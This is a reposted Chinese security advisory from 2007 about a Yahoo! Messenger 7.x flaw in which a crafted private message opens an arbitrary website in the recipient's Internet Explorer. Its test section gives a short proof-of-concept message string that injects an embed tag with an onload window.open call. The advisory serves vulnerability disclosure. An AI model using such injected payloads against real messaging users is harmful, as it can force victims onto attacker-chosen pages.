 |
雅虎通远程消息任意浏览器访问导航漏洞 |
|
|
| 雅虎通远程消息任意浏览器访问导航漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-26 8:41:41 |
|
受影响系统:
Yahoo! Messenger 7.5.814
Yahoo! Messenger 7.0.438
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19211
雅虎通是一款非常流行的即时通讯工具。
雅虎通在处理用户搜索串时存在漏洞,远程攻击者可能利用此漏洞使用户打开任意网站。
如果远程用户能够向其联系人发送特制的私人消息的话,就会在受害用户的IE浏览器中打开任意站点。
<*来源:Ivan Ivan (ivancool2003@yahoo.com.ar)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=115409971706365&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
string: s: helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:-------------------------------------- /
> -------<embed
onload=window.open('http:////google.com/')>helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:-------------------------------------- /
> -------<embed
onload=window.open('http:////google.com/')>helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
建议:
--------------------------------------------------------------------------------
厂商补丁:
Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://messenger.yahoo.com/ 【转自世纪安全网 http://www.21safe.com】
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: Skype爆出安全漏洞 黑客可后台盗取重要文件
下一篇新闻: ICQ ActiveX控件远程代码执行漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
